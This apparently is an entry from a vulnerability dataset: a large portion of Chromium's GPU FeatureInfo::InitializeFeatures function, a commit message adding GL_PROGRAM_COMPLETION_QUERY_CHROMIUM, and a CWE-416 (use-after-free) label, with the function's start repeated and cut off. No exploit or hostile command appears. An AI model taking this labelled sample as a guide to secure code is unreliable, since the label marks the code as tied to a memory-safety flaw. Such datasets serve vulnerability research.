AddExtensionString("GL_EXT_disjoint_timer_query"); } if (gfx::HasExtension(extensions, "GL_OES_rgb8_rgba8") || gl::HasDesktopGLFeatures()) { AddExtensionString("GL_OES_rgb8_rgba8"); validators_.render_buffer_format.AddValue(GL_RGB8_OES); validators_.render_buffer_format.AddValue(GL_RGBA8_OES); } if (!disallowed_features_.npot_support && (gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile || gfx::HasExtension(extensions, "GL_ARB_texture_non_power_of_two") || gfx::HasExtension(extensions, "GL_OES_texture_npot"))) { AddExtensionString("GL_OES_texture_npot"); feature_flags_.npot_ok = true; } InitializeFloatAndHalfFloatFeatures(extensions); if (!workarounds_.disable_chromium_framebuffer_multisample) { bool ext_has_multisample = gfx::HasExtension(extensions, "GL_ARB_framebuffer_object") || (gfx::HasExtension(extensions, "GL_EXT_framebuffer_multisample") && gfx::HasExtension(extensions, "GL_EXT_framebuffer_blit")) || gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile; if (gl_version_info_->is_angle || gl_version_info_->is_swiftshader) { ext_has_multisample |= gfx::HasExtension(extensions, "GL_ANGLE_framebuffer_multisample"); } if (ext_has_multisample) { feature_flags_.chromium_framebuffer_multisample = true; validators_.framebuffer_target.AddValue(GL_READ_FRAMEBUFFER_EXT); validators_.framebuffer_target.AddValue(GL_DRAW_FRAMEBUFFER_EXT); validators_.g_l_state.AddValue(GL_READ_FRAMEBUFFER_BINDING_EXT); validators_.g_l_state.AddValue(GL_MAX_SAMPLES_EXT); validators_.render_buffer_parameter.AddValue(GL_RENDERBUFFER_SAMPLES_EXT); AddExtensionString("GL_CHROMIUM_framebuffer_multisample"); } } if (gfx::HasExtension(extensions, "GL_EXT_multisampled_render_to_texture")) { feature_flags_.multisampled_render_to_texture = true; } else if (gfx::HasExtension(extensions, "GL_IMG_multisampled_render_to_texture")) { feature_flags_.multisampled_render_to_texture = true; feature_flags_.use_img_for_multisampled_render_to_texture = true; } if (feature_flags_.multisampled_render_to_texture) { validators_.render_buffer_parameter.AddValue(GL_RENDERBUFFER_SAMPLES_EXT); validators_.g_l_state.AddValue(GL_MAX_SAMPLES_EXT); validators_.framebuffer_attachment_parameter.AddValue( GL_FRAMEBUFFER_ATTACHMENT_TEXTURE_SAMPLES_EXT); AddExtensionString("GL_EXT_multisampled_render_to_texture"); } if (!gl_version_info_->is_es || gfx::HasExtension(extensions, "GL_EXT_multisample_compatibility")) { AddExtensionString("GL_EXT_multisample_compatibility"); feature_flags_.ext_multisample_compatibility = true; validators_.capability.AddValue(GL_MULTISAMPLE_EXT); validators_.capability.AddValue(GL_SAMPLE_ALPHA_TO_ONE_EXT); } if (gfx::HasExtension(extensions, "GL_INTEL_framebuffer_CMAA")) { feature_flags_.chromium_screen_space_antialiasing = true; AddExtensionString("GL_CHROMIUM_screen_space_antialiasing"); } else if (gl_version_info_->IsAtLeastGLES(3, 1) || (gl_version_info_->IsAtLeastGL(3, 0) && gfx::HasExtension(extensions, "GL_ARB_shading_language_420pack") && gfx::HasExtension(extensions, "GL_ARB_texture_storage") && gfx::HasExtension(extensions, "GL_ARB_texture_gather") && gfx::HasExtension(extensions, "GL_ARB_explicit_uniform_location") && gfx::HasExtension(extensions, "GL_ARB_explicit_attrib_location") && gfx::HasExtension(extensions, "GL_ARB_shader_image_load_store"))) { feature_flags_.chromium_screen_space_antialiasing = true; feature_flags_.use_chromium_screen_space_antialiasing_via_shaders = true; AddExtensionString("GL_CHROMIUM_screen_space_antialiasing"); } if (gfx::HasExtension(extensions, "GL_OES_depth24") || gl::HasDesktopGLFeatures() || gl_version_info_->is_es3) { AddExtensionString("GL_OES_depth24"); feature_flags_.oes_depth24 = true; validators_.render_buffer_format.AddValue(GL_DEPTH_COMPONENT24); } if (gl_version_info_->is_es3 || gfx::HasExtension(extensions, "GL_OES_standard_derivatives") || gl::HasDesktopGLFeatures()) { AddExtensionString("GL_OES_standard_derivatives"); feature_flags_.oes_standard_derivatives = true; validators_.hint_target.AddValue(GL_FRAGMENT_SHADER_DERIVATIVE_HINT_OES); validators_.g_l_state.AddValue(GL_FRAGMENT_SHADER_DERIVATIVE_HINT_OES); } if (gfx::HasExtension(extensions, "GL_CHROMIUM_texture_filtering_hint")) { AddExtensionString("GL_CHROMIUM_texture_filtering_hint"); feature_flags_.chromium_texture_filtering_hint = true; validators_.hint_target.AddValue(GL_TEXTURE_FILTERING_HINT_CHROMIUM); validators_.g_l_state.AddValue(GL_TEXTURE_FILTERING_HINT_CHROMIUM); } if (gfx::HasExtension(extensions, "GL_OES_EGL_image_external")) { AddExtensionString("GL_OES_EGL_image_external"); feature_flags_.oes_egl_image_external = true; } if (gfx::HasExtension(extensions, "GL_NV_EGL_stream_consumer_external")) { AddExtensionString("GL_NV_EGL_stream_consumer_external"); feature_flags_.nv_egl_stream_consumer_external = true; } if (feature_flags_.oes_egl_image_external || feature_flags_.nv_egl_stream_consumer_external) { validators_.texture_bind_target.AddValue(GL_TEXTURE_EXTERNAL_OES); validators_.get_tex_param_target.AddValue(GL_TEXTURE_EXTERNAL_OES); validators_.texture_parameter.AddValue(GL_REQUIRED_TEXTURE_IMAGE_UNITS_OES); validators_.g_l_state.AddValue(GL_TEXTURE_BINDING_EXTERNAL_OES); } if (gfx::HasExtension(extensions, "GL_OES_compressed_ETC1_RGB8_texture") && !gl_version_info_->is_angle) { AddExtensionString("GL_OES_compressed_ETC1_RGB8_texture"); feature_flags_.oes_compressed_etc1_rgb8_texture = true; validators_.compressed_texture_format.AddValue(GL_ETC1_RGB8_OES); validators_.texture_internal_format_storage.AddValue(GL_ETC1_RGB8_OES); } if (gfx::HasExtension(extensions, "GL_CHROMIUM_compressed_texture_etc") || (gl_version_info_->is_es3 && !gl_version_info_->is_angle)) { AddExtensionString("GL_CHROMIUM_compressed_texture_etc"); validators_.UpdateETCCompressedTextureFormats(); } if (gfx::HasExtension(extensions, "GL_AMD_compressed_ATC_texture")) { AddExtensionString("GL_AMD_compressed_ATC_texture"); validators_.compressed_texture_format.AddValue(GL_ATC_RGB_AMD); validators_.compressed_texture_format.AddValue( GL_ATC_RGBA_EXPLICIT_ALPHA_AMD); validators_.compressed_texture_format.AddValue( GL_ATC_RGBA_INTERPOLATED_ALPHA_AMD); validators_.texture_internal_format_storage.AddValue(GL_ATC_RGB_AMD); validators_.texture_internal_format_storage.AddValue( GL_ATC_RGBA_EXPLICIT_ALPHA_AMD); validators_.texture_internal_format_storage.AddValue( GL_ATC_RGBA_INTERPOLATED_ALPHA_AMD); } if (gfx::HasExtension(extensions, "GL_IMG_texture_compression_pvrtc")) { AddExtensionString("GL_IMG_texture_compression_pvrtc"); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGB_PVRTC_4BPPV1_IMG); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGB_PVRTC_2BPPV1_IMG); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGBA_PVRTC_4BPPV1_IMG); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGBA_PVRTC_2BPPV1_IMG); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGB_PVRTC_4BPPV1_IMG); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGB_PVRTC_2BPPV1_IMG); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGBA_PVRTC_4BPPV1_IMG); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGBA_PVRTC_2BPPV1_IMG); } if (gfx::HasExtension(extensions, "GL_ARB_texture_rectangle") || gfx::HasExtension(extensions, "GL_ANGLE_texture_rectangle") || gl_version_info_->is_desktop_core_profile) { AddExtensionString("GL_ARB_texture_rectangle"); feature_flags_.arb_texture_rectangle = true; validators_.texture_bind_target.AddValue(GL_TEXTURE_RECTANGLE_ARB); validators_.texture_target.AddValue(GL_TEXTURE_RECTANGLE_ARB); validators_.get_tex_param_target.AddValue(GL_TEXTURE_RECTANGLE_ARB); validators_.g_l_state.AddValue(GL_TEXTURE_BINDING_RECTANGLE_ARB); } #if defined(OS_MACOSX) || defined(OS_CHROMEOS) AddExtensionString("GL_CHROMIUM_ycbcr_420v_image"); feature_flags_.chromium_image_ycbcr_420v = true; #endif if (feature_flags_.chromium_image_ycbcr_420v) { feature_flags_.gpu_memory_buffer_formats.Add( gfx::BufferFormat::YUV_420_BIPLANAR); } if (gfx::HasExtension(extensions, "GL_APPLE_ycbcr_422")) { AddExtensionString("GL_CHROMIUM_ycbcr_422_image"); feature_flags_.chromium_image_ycbcr_422 = true; feature_flags_.gpu_memory_buffer_formats.Add(gfx::BufferFormat::UYVY_422); } #if defined(OS_MACOSX) feature_flags_.chromium_image_xr30 = base::mac::IsAtLeastOS10_13(); #elif !defined(OS_WIN) feature_flags_.chromium_image_xb30 = gl_version_info_->IsAtLeastGL(3, 3) || gl_version_info_->IsAtLeastGLES(3, 0) || gfx::HasExtension(extensions, "GL_EXT_texture_type_2_10_10_10_REV"); #endif if (feature_flags_.chromium_image_xr30 || feature_flags_.chromium_image_xb30) { validators_.texture_internal_format.AddValue(GL_RGB10_A2_EXT); validators_.render_buffer_format.AddValue(GL_RGB10_A2_EXT); validators_.texture_internal_format_storage.AddValue(GL_RGB10_A2_EXT); validators_.pixel_type.AddValue(GL_UNSIGNED_INT_2_10_10_10_REV); } if (feature_flags_.chromium_image_xr30) { feature_flags_.gpu_memory_buffer_formats.Add( gfx::BufferFormat::BGRX_1010102); } if (feature_flags_.chromium_image_xb30) { feature_flags_.gpu_memory_buffer_formats.Add( gfx::BufferFormat::RGBX_1010102); } if (gfx::HasExtension(extensions, "GL_ANGLE_texture_usage")) { feature_flags_.angle_texture_usage = true; AddExtensionString("GL_ANGLE_texture_usage"); validators_.texture_parameter.AddValue(GL_TEXTURE_USAGE_ANGLE); } bool have_occlusion_query = gl_version_info_->IsAtLeastGLES(3, 0) || gl_version_info_->IsAtLeastGL(3, 3); bool have_ext_occlusion_query_boolean = gfx::HasExtension(extensions, "GL_EXT_occlusion_query_boolean"); bool have_arb_occlusion_query2 = gfx::HasExtension(extensions, "GL_ARB_occlusion_query2"); bool have_arb_occlusion_query = (gl_version_info_->is_desktop_core_profile && gl_version_info_->IsAtLeastGL(1, 5)) || gfx::HasExtension(extensions, "GL_ARB_occlusion_query"); if (have_occlusion_query || have_ext_occlusion_query_boolean || have_arb_occlusion_query2 || have_arb_occlusion_query) { feature_flags_.occlusion_query = have_arb_occlusion_query; if (context_type_ == CONTEXT_TYPE_OPENGLES2) { AddExtensionString("GL_EXT_occlusion_query_boolean"); } feature_flags_.occlusion_query_boolean = true; feature_flags_.use_arb_occlusion_query2_for_occlusion_query_boolean = !have_ext_occlusion_query_boolean && (have_arb_occlusion_query2 || (gl_version_info_->IsAtLeastGL(3, 3) && gl_version_info_->IsLowerThanGL(4, 3))); feature_flags_.use_arb_occlusion_query_for_occlusion_query_boolean = !have_ext_occlusion_query_boolean && have_arb_occlusion_query && !have_arb_occlusion_query2; } if (gfx::HasExtension(extensions, "GL_ANGLE_instanced_arrays") || (gfx::HasExtension(extensions, "GL_ARB_instanced_arrays") && gfx::HasExtension(extensions, "GL_ARB_draw_instanced")) || gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile) { AddExtensionString("GL_ANGLE_instanced_arrays"); feature_flags_.angle_instanced_arrays = true; validators_.vertex_attribute.AddValue(GL_VERTEX_ATTRIB_ARRAY_DIVISOR_ANGLE); } bool have_es2_draw_buffers_vendor_agnostic = gl_version_info_->is_desktop_core_profile || gfx::HasExtension(extensions, "GL_ARB_draw_buffers") || gfx::HasExtension(extensions, "GL_EXT_draw_buffers"); bool can_emulate_es2_draw_buffers_on_es3_nv = gl_version_info_->is_es3 && gfx::HasExtension(extensions, "GL_NV_draw_buffers"); bool is_webgl_compatibility_context = gfx::HasExtension(extensions, "GL_ANGLE_webgl_compatibility"); bool have_es2_draw_buffers = !workarounds_.disable_ext_draw_buffers && (have_es2_draw_buffers_vendor_agnostic || can_emulate_es2_draw_buffers_on_es3_nv) && (context_type_ == CONTEXT_TYPE_OPENGLES2 || (context_type_ == CONTEXT_TYPE_WEBGL1 && IsWebGLDrawBuffersSupported(is_webgl_compatibility_context, depth_texture_format, depth_stencil_texture_format))); if (have_es2_draw_buffers) { AddExtensionString("GL_EXT_draw_buffers"); feature_flags_.ext_draw_buffers = true; feature_flags_.nv_draw_buffers = can_emulate_es2_draw_buffers_on_es3_nv && !have_es2_draw_buffers_vendor_agnostic; } if (IsWebGL2OrES3OrHigherContext() || have_es2_draw_buffers) { GLint max_color_attachments = 0; glGetIntegerv(GL_MAX_COLOR_ATTACHMENTS_EXT, &max_color_attachments); for (GLenum i = GL_COLOR_ATTACHMENT1_EXT; i < static_cast<GLenum>(GL_COLOR_ATTACHMENT0 + max_color_attachments); ++i) { validators_.attachment.AddValue(i); validators_.attachment_query.AddValue(i); } static_assert(GL_COLOR_ATTACHMENT0_EXT == GL_COLOR_ATTACHMENT0, "GL_COLOR_ATTACHMENT0_EXT should equal GL_COLOR_ATTACHMENT0"); validators_.g_l_state.AddValue(GL_MAX_COLOR_ATTACHMENTS_EXT); validators_.g_l_state.AddValue(GL_MAX_DRAW_BUFFERS_ARB); GLint max_draw_buffers = 0; glGetIntegerv(GL_MAX_DRAW_BUFFERS_ARB, &max_draw_buffers); for (GLenum i = GL_DRAW_BUFFER0_ARB; i < static_cast<GLenum>(GL_DRAW_BUFFER0_ARB + max_draw_buffers); ++i) { validators_.g_l_state.AddValue(i); } } if (gl_version_info_->is_es3 || gfx::HasExtension(extensions, "GL_EXT_blend_minmax") || gl::HasDesktopGLFeatures()) { AddExtensionString("GL_EXT_blend_minmax"); validators_.equation.AddValue(GL_MIN_EXT); validators_.equation.AddValue(GL_MAX_EXT); static_assert(GL_MIN_EXT == GL_MIN && GL_MAX_EXT == GL_MAX, "min & max variations must match"); } if (gfx::HasExtension(extensions, "GL_EXT_frag_depth") || gl::HasDesktopGLFeatures()) { AddExtensionString("GL_EXT_frag_depth"); feature_flags_.ext_frag_depth = true; } if (gfx::HasExtension(extensions, "GL_EXT_shader_texture_lod") || gl::HasDesktopGLFeatures()) { AddExtensionString("GL_EXT_shader_texture_lod"); feature_flags_.ext_shader_texture_lod = true; } bool ui_gl_fence_works = gl::GLFence::IsSupported(); UMA_HISTOGRAM_BOOLEAN("GPU.FenceSupport", ui_gl_fence_works); feature_flags_.map_buffer_range = gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile || gfx::HasExtension(extensions, "GL_ARB_map_buffer_range") || gfx::HasExtension(extensions, "GL_EXT_map_buffer_range"); if (has_pixel_buffers && ui_gl_fence_works && !workarounds_.disable_async_readpixels) { feature_flags_.use_async_readpixels = true; } if (gl_version_info_->is_es3 || gfx::HasExtension(extensions, "GL_ARB_sampler_objects")) { feature_flags_.enable_samplers = true; } if ((gl_version_info_->is_es3 || gfx::HasExtension(extensions, "GL_EXT_discard_framebuffer")) && !workarounds_.disable_discard_framebuffer) { AddExtensionString("GL_EXT_discard_framebuffer"); feature_flags_.ext_discard_framebuffer = true; } if (ui_gl_fence_works) { AddExtensionString("GL_CHROMIUM_sync_query"); feature_flags_.chromium_sync_query = true; } if (!workarounds_.disable_blend_equation_advanced) { bool blend_equation_advanced_coherent = gfx::HasExtension(extensions, "GL_NV_blend_equation_advanced_coherent") || gfx::HasExtension(extensions, "GL_KHR_blend_equation_advanced_coherent"); if (blend_equation_advanced_coherent || gfx::HasExtension(extensions, "GL_NV_blend_equation_advanced") || gfx::HasExtension(extensions, "GL_KHR_blend_equation_advanced")) { const GLenum equations[] = { GL_MULTIPLY_KHR, GL_SCREEN_KHR, GL_OVERLAY_KHR, GL_DARKEN_KHR, GL_LIGHTEN_KHR, GL_COLORDODGE_KHR, GL_COLORBURN_KHR, GL_HARDLIGHT_KHR, GL_SOFTLIGHT_KHR, GL_DIFFERENCE_KHR, GL_EXCLUSION_KHR, GL_HSL_HUE_KHR, GL_HSL_SATURATION_KHR, GL_HSL_COLOR_KHR, GL_HSL_LUMINOSITY_KHR}; for (GLenum equation : equations) validators_.equation.AddValue(equation); if (blend_equation_advanced_coherent) AddExtensionString("GL_KHR_blend_equation_advanced_coherent"); AddExtensionString("GL_KHR_blend_equation_advanced"); feature_flags_.blend_equation_advanced = true; feature_flags_.blend_equation_advanced_coherent = blend_equation_advanced_coherent; } } if (gfx::HasExtension(extensions, "GL_NV_framebuffer_mixed_samples")) { AddExtensionString("GL_CHROMIUM_framebuffer_mixed_samples"); feature_flags_.chromium_framebuffer_mixed_samples = true; validators_.g_l_state.AddValue(GL_COVERAGE_MODULATION_CHROMIUM); } if (gfx::HasExtension(extensions, "GL_NV_path_rendering")) { bool has_dsa = gl_version_info_->IsAtLeastGL(4, 5) || gfx::HasExtension(extensions, "GL_EXT_direct_state_access"); bool has_piq = gl_version_info_->IsAtLeastGL(4, 3) || gfx::HasExtension(extensions, "GL_ARB_program_interface_query"); bool has_fms = feature_flags_.chromium_framebuffer_mixed_samples; if ((gl_version_info_->IsAtLeastGLES(3, 1) || (gl_version_info_->IsAtLeastGL(3, 2) && has_dsa && has_piq)) && has_fms) { AddExtensionString("GL_CHROMIUM_path_rendering"); feature_flags_.chromium_path_rendering = true; validators_.g_l_state.AddValue(GL_PATH_MODELVIEW_MATRIX_CHROMIUM); validators_.g_l_state.AddValue(GL_PATH_PROJECTION_MATRIX_CHROMIUM); validators_.g_l_state.AddValue(GL_PATH_STENCIL_FUNC_CHROMIUM); validators_.g_l_state.AddValue(GL_PATH_STENCIL_REF_CHROMIUM); validators_.g_l_state.AddValue(GL_PATH_STENCIL_VALUE_MASK_CHROMIUM); } } if ((gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile || gfx::HasExtension(extensions, "GL_EXT_texture_rg") || gfx::HasExtension(extensions, "GL_ARB_texture_rg")) && IsGL_REDSupportedOnFBOs()) { feature_flags_.ext_texture_rg = true; AddExtensionString("GL_EXT_texture_rg"); validators_.texture_format.AddValue(GL_RED_EXT); validators_.texture_format.AddValue(GL_RG_EXT); validators_.texture_internal_format.AddValue(GL_RED_EXT); validators_.texture_internal_format.AddValue(GL_R8_EXT); validators_.texture_internal_format.AddValue(GL_RG_EXT); validators_.texture_internal_format.AddValue(GL_RG8_EXT); validators_.read_pixel_format.AddValue(GL_RED_EXT); validators_.read_pixel_format.AddValue(GL_RG_EXT); validators_.render_buffer_format.AddValue(GL_R8_EXT); validators_.render_buffer_format.AddValue(GL_RG8_EXT); validators_.texture_unsized_internal_format.AddValue(GL_RED_EXT); validators_.texture_unsized_internal_format.AddValue(GL_RG_EXT); validators_.texture_internal_format_storage.AddValue(GL_R8_EXT); validators_.texture_internal_format_storage.AddValue(GL_RG8_EXT); feature_flags_.gpu_memory_buffer_formats.Add(gfx::BufferFormat::R_8); feature_flags_.gpu_memory_buffer_formats.Add(gfx::BufferFormat::RG_88); } UMA_HISTOGRAM_BOOLEAN("GPU.TextureRG", feature_flags_.ext_texture_rg); if (gl_version_info_->is_desktop_core_profile || (gl_version_info_->IsAtLeastGL(2, 1) && gfx::HasExtension(extensions, "GL_ARB_texture_rg")) || gfx::HasExtension(extensions, "GL_EXT_texture_norm16")) { feature_flags_.ext_texture_norm16 = true; g_r16_is_present = true; validators_.pixel_type.AddValue(GL_UNSIGNED_SHORT); validators_.texture_format.AddValue(GL_RED_EXT); validators_.texture_internal_format.AddValue(GL_R16_EXT); validators_.texture_internal_format.AddValue(GL_RED_EXT); validators_.texture_unsized_internal_format.AddValue(GL_RED_EXT); validators_.texture_internal_format_storage.AddValue(GL_R16_EXT); feature_flags_.gpu_memory_buffer_formats.Add(gfx::BufferFormat::R_16); } UMA_HISTOGRAM_ENUMERATION( "GPU.TextureR16Ext_LuminanceF16", GpuTextureUMAHelper(), static_cast<int>(GpuTextureResultR16_L16::kMax) + 1); if (enable_es3 && gfx::HasExtension(extensions, "GL_EXT_window_rectangles")) { AddExtensionString("GL_EXT_window_rectangles"); feature_flags_.ext_window_rectangles = true; validators_.g_l_state.AddValue(GL_WINDOW_RECTANGLE_MODE_EXT); validators_.g_l_state.AddValue(GL_MAX_WINDOW_RECTANGLES_EXT); validators_.g_l_state.AddValue(GL_NUM_WINDOW_RECTANGLES_EXT); validators_.indexed_g_l_state.AddValue(GL_WINDOW_RECTANGLE_EXT); } bool has_opengl_dual_source_blending = gl_version_info_->IsAtLeastGL(3, 3) || (gl_version_info_->IsAtLeastGL(3, 2) && gfx::HasExtension(extensions, "GL_ARB_blend_func_extended")); if (!disable_shader_translator_ && !workarounds_.get_frag_data_info_bug && ((gl_version_info_->IsAtLeastGL(3, 2) && has_opengl_dual_source_blending) || (gl_version_info_->IsAtLeastGLES(3, 0) && gfx::HasExtension(extensions, "GL_EXT_blend_func_extended")))) { feature_flags_.ext_blend_func_extended = true; AddExtensionString("GL_EXT_blend_func_extended"); validators_.dst_blend_factor.AddValue(GL_SRC_ALPHA_SATURATE_EXT); validators_.src_blend_factor.AddValue(GL_SRC1_ALPHA_EXT); validators_.dst_blend_factor.AddValue(GL_SRC1_ALPHA_EXT); validators_.src_blend_factor.AddValue(GL_SRC1_COLOR_EXT); validators_.dst_blend_factor.AddValue(GL_SRC1_COLOR_EXT); validators_.src_blend_factor.AddValue(GL_ONE_MINUS_SRC1_COLOR_EXT); validators_.dst_blend_factor.AddValue(GL_ONE_MINUS_SRC1_COLOR_EXT); validators_.src_blend_factor.AddValue(GL_ONE_MINUS_SRC1_ALPHA_EXT); validators_.dst_blend_factor.AddValue(GL_ONE_MINUS_SRC1_ALPHA_EXT); validators_.g_l_state.AddValue(GL_MAX_DUAL_SOURCE_DRAW_BUFFERS_EXT); } #if !defined(OS_MACOSX) if (workarounds_.ignore_egl_sync_failures) { gl::GLFenceEGL::SetIgnoreFailures(); } #endif if (workarounds_.avoid_egl_image_target_texture_reuse) { TextureDefinition::AvoidEGLTargetTextureReuse(); } if (gl_version_info_->IsLowerThanGL(4, 3)) { feature_flags_.emulate_primitive_restart_fixed_index = true; } feature_flags_.angle_robust_client_memory = gfx::HasExtension(extensions, "GL_ANGLE_robust_client_memory"); feature_flags_.khr_debug = gl_version_info_->IsAtLeastGL(4, 3) || gl_version_info_->IsAtLeastGLES(3, 2) || gfx::HasExtension(extensions, "GL_KHR_debug"); feature_flags_.chromium_gpu_fence = gl::GLFence::IsGpuFenceSupported(); if (feature_flags_.chromium_gpu_fence) AddExtensionString("GL_CHROMIUM_gpu_fence"); feature_flags_.chromium_bind_generates_resource = gfx::HasExtension(extensions, "GL_CHROMIUM_bind_generates_resource"); feature_flags_.angle_webgl_compatibility = is_webgl_compatibility_context; feature_flags_.chromium_copy_texture = gfx::HasExtension(extensions, "GL_CHROMIUM_copy_texture"); feature_flags_.chromium_copy_compressed_texture = gfx::HasExtension(extensions, "GL_CHROMIUM_copy_compressed_texture"); feature_flags_.angle_client_arrays = gfx::HasExtension(extensions, "GL_ANGLE_client_arrays"); feature_flags_.angle_request_extension = gfx::HasExtension(extensions, "GL_ANGLE_request_extension"); feature_flags_.ext_debug_marker = gfx::HasExtension(extensions, "GL_EXT_debug_marker"); feature_flags_.arb_robustness = gfx::HasExtension(extensions, "GL_ARB_robustness"); feature_flags_.khr_robustness = gfx::HasExtension(extensions, "GL_KHR_robustness"); feature_flags_.ext_robustness = gfx::HasExtension(extensions, "GL_EXT_robustness"); feature_flags_.ext_pixel_buffer_object = gfx::HasExtension(extensions, "GL_ARB_pixel_buffer_object") || gfx::HasExtension(extensions, "GL_NV_pixel_buffer_object"); feature_flags_.ext_unpack_subimage = gfx::HasExtension(extensions, "GL_EXT_unpack_subimage"); feature_flags_.oes_rgb8_rgba8 = gfx::HasExtension(extensions, "GL_OES_rgb8_rgba8"); feature_flags_.angle_robust_resource_initialization = gfx::HasExtension(extensions, "GL_ANGLE_robust_resource_initialization"); feature_flags_.nv_fence = gfx::HasExtension(extensions, "GL_NV_fence"); feature_flags_.unpremultiply_and_dither_copy = !is_passthrough_cmd_decoder_; if (feature_flags_.unpremultiply_and_dither_copy) AddExtensionString("GL_CHROMIUM_unpremultiply_and_dither_copy"); feature_flags_.separate_stencil_ref_mask_writemask = !(gl_version_info_->is_d3d) && !IsWebGLContext(); if (gfx::HasExtension(extensions, "GL_MESA_framebuffer_flip_y")) { feature_flags_.mesa_framebuffer_flip_y = true; validators_.framebuffer_parameter.AddValue(GL_FRAMEBUFFER_FLIP_Y_MESA); AddExtensionString("GL_MESA_framebuffer_flip_y"); } if (is_passthrough_cmd_decoder_ && gfx::HasExtension(extensions, "GL_OVR_multiview2")) { AddExtensionString("GL_OVR_multiview2"); feature_flags_.ovr_multiview2 = true; } if (is_passthrough_cmd_decoder_ && gfx::HasExtension(extensions, "GL_KHR_parallel_shader_compile")) { AddExtensionString("GL_KHR_parallel_shader_compile"); feature_flags_.khr_parallel_shader_compile = true; validators_.g_l_state.AddValue(GL_MAX_SHADER_COMPILER_THREADS_KHR); validators_.shader_parameter.AddValue(GL_COMPLETION_STATUS_KHR); validators_.program_parameter.AddValue(GL_COMPLETION_STATUS_KHR); } if (gfx::HasExtension(extensions, "GL_KHR_robust_buffer_access_behavior")) { AddExtensionString("GL_KHR_robust_buffer_access_behavior"); feature_flags_.khr_robust_buffer_access_behavior = true; } if (!is_passthrough_cmd_decoder_ || gfx::HasExtension(extensions, "GL_ANGLE_multi_draw")) { feature_flags_.webgl_multi_draw = true; AddExtensionString("GL_WEBGL_multi_draw"); if (gfx::HasExtension(extensions, "GL_ANGLE_instanced_arrays") || feature_flags_.angle_instanced_arrays || gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile) { feature_flags_.webgl_multi_draw_instanced = true; AddExtensionString("GL_WEBGL_multi_draw_instanced"); } } if (gfx::HasExtension(extensions, "GL_NV_internalformat_sample_query")) { feature_flags_.nv_internalformat_sample_query = true; } if (gfx::HasExtension(extensions, "GL_AMD_framebuffer_multisample_advanced")) { feature_flags_.amd_framebuffer_multisample_advanced = true; AddExtensionString("GL_AMD_framebuffer_multisample_advanced"); } } Commit Message: Add GL_PROGRAM_COMPLETION_QUERY_CHROMIUM This makes the query of GL_COMPLETION_STATUS_KHR to programs much cheaper by minimizing the round-trip to the GPU thread. Bug: 881152, 957001 Change-Id: Iadfa798af29225e752c710ca5c25f50b3dd3101a Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1586630 Commit-Queue: Kenneth Russell <kbr@chromium.org> Reviewed-by: Kentaro Hara <haraken@chromium.org> Reviewed-by: Geoff Lang <geofflang@chromium.org> Reviewed-by: Kenneth Russell <kbr@chromium.org> Cr-Commit-Position: refs/heads/master@{#657568} CWE ID: CWE-416
void FeatureInfo::InitializeFeatures() { std::string extensions_string(gl::GetGLExtensionsFromCurrentContext()); gfx::ExtensionSet extensions(gfx::MakeExtensionSet(extensions_string)); const char* version_str = reinterpret_cast<const char*>(glGetString(GL_VERSION)); const char* renderer_str = reinterpret_cast<const char*>(glGetString(GL_RENDERER)); gl_version_info_.reset( new gl::GLVersionInfo(version_str, renderer_str, extensions)); bool enable_es3 = IsWebGL2OrES3OrHigherContext(); bool has_pixel_buffers = gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile || gfx::HasExtension(extensions, "GL_ARB_pixel_buffer_object") || gfx::HasExtension(extensions, "GL_NV_pixel_buffer_object"); ScopedPixelUnpackBufferOverride scoped_pbo_override(has_pixel_buffers, 0); AddExtensionString("GL_ANGLE_translated_shader_source"); AddExtensionString("GL_CHROMIUM_async_pixel_transfers"); AddExtensionString("GL_CHROMIUM_bind_uniform_location"); AddExtensionString("GL_CHROMIUM_color_space_metadata"); AddExtensionString("GL_CHROMIUM_command_buffer_query"); AddExtensionString("GL_CHROMIUM_command_buffer_latency_query"); AddExtensionString("GL_CHROMIUM_copy_texture"); AddExtensionString("GL_CHROMIUM_deschedule"); AddExtensionString("GL_CHROMIUM_get_error_query"); AddExtensionString("GL_CHROMIUM_lose_context"); AddExtensionString("GL_CHROMIUM_pixel_transfer_buffer_object"); AddExtensionString("GL_CHROMIUM_rate_limit_offscreen_context"); AddExtensionString("GL_CHROMIUM_resize"); AddExtensionString("GL_CHROMIUM_resource_safe"); AddExtensionString("GL_CHROMIUM_strict_attribs"); AddExtensionString("GL_CHROMIUM_texture_mailbox"); AddExtensionString("GL_CHROMIUM_trace_marker"); AddExtensionString("GL_EXT_debug_marker"); AddExtensionString("GL_EXT_unpack_subimage"); AddExtensionString("GL_OES_vertex_array_object"); if (gfx::HasExtension(extensions, "GL_ANGLE_translated_shader_source")) { feature_flags_.angle_translated_shader_source = true; } bool enable_dxt1 = false; bool enable_dxt3 = false; bool enable_dxt5 = false; bool have_s3tc = gfx::HasExtension(extensions, "GL_EXT_texture_compression_s3tc"); bool have_dxt3 = have_s3tc || gfx::HasExtension(extensions, "GL_ANGLE_texture_compression_dxt3"); bool have_dxt5 = have_s3tc || gfx::HasExtension(extensions, "GL_ANGLE_texture_compression_dxt5"); if (gfx::HasExtension(extensions, "GL_EXT_texture_compression_dxt1") || gfx::HasExtension(extensions, "GL_ANGLE_texture_compression_dxt1") || have_s3tc) { enable_dxt1 = true; } if (have_dxt3) { enable_dxt3 = true; } if (have_dxt5) { enable_dxt5 = true; } if (enable_dxt1) { feature_flags_.ext_texture_format_dxt1 = true; AddExtensionString("GL_ANGLE_texture_compression_dxt1"); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGB_S3TC_DXT1_EXT); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGBA_S3TC_DXT1_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGB_S3TC_DXT1_EXT); validators_.texture_internal_format_storage.AddValue( 